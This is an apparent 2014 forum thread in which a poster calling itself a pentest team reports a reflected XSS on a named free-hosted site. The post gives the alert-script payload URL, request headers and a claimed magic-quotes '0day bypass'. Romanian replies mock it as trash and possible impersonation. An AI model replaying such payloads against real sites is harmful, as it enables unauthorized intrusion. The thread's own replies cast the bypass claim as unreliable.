Jump to content
HackYard_Pentest_Team

[XSS] pakistan-gov-biz-tk.comxa.com/bank.php

Recommended Posts

Posted

HackYard Pentest Team

Author : Pentest-Team of Hackyard Security Group

Raported: 04.feb.2014 Today 00:17

Resolved Issue : ?.?.???? ??:??

Issue: Cross-site scripting (reflected)

Severity: Critical

Confidence: Certain

0day bypass:This filter replace ' with \' and " with \" so HackYard Pentest Team found 0day in this php function known as "magicquotes" to make successful cross side scripting.

Host:Web hosting, domain names, VPS - 000webhost.com

Path: /bank.php?pro="><script>alert(/HackYard-Pentest-Team!/)</script>

Reguest in get parameter:

Host: pakistan-gov-biz-tk.comxa.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

POC :

53n2fn.jpg

First mail delivered by "pakistanhackteam@legit.biz.tk".

This is an automatic response.

Referral was submitted pakistan technical department and you will be contacted as soon as possible by a system administrator. If you want to return the details of the complaints please keep the message the same subject, topic including ticket number associated.

*** Ticket ID: nwmn-3949-394983
*** Subject: [Cross-Side-Scripting] pakistan-gov-biz-tk.comxa.com/ REPORT
*** Department: Technical Dept.
*** Type: sensing technique
*** Status: Open

Posted

Sper ca ai glumit :))

lol

First mail delivered by "pakistanhackteam@legit.biz.tk".

Code:

This is an automatic response.

Referral was submitted pakistan technical department and you will be contacted as soon as possible by a system administrator. If you want to return the details of the complaints please keep the message the same subject, topic including ticket number associated.

*** Ticket ID: nwmn-3949-394983

*** Subject: [Cross-Side-Scripting] pakistan-gov-biz-tk.comxa.com/ REPORT

*** Department: Technical Dept.

*** Type: sensing technique

*** Status: Open

Posted

HackYard Pentest Team

Author : Pentest-Team of Hackyard Security Group

asta explica tot

Posted

Nu stiu ce fel de bug bounty este acesta, dar mie mi se pare trash. Mai ales acel "0 day".

Este mai probabil ca cineva sa vrea sa isi bata joc de numele hackyardului si sa faca posturile astea penibile in numele lor.

Closed!

Guest
This topic is now closed to further replies.


×
×
  • Create New...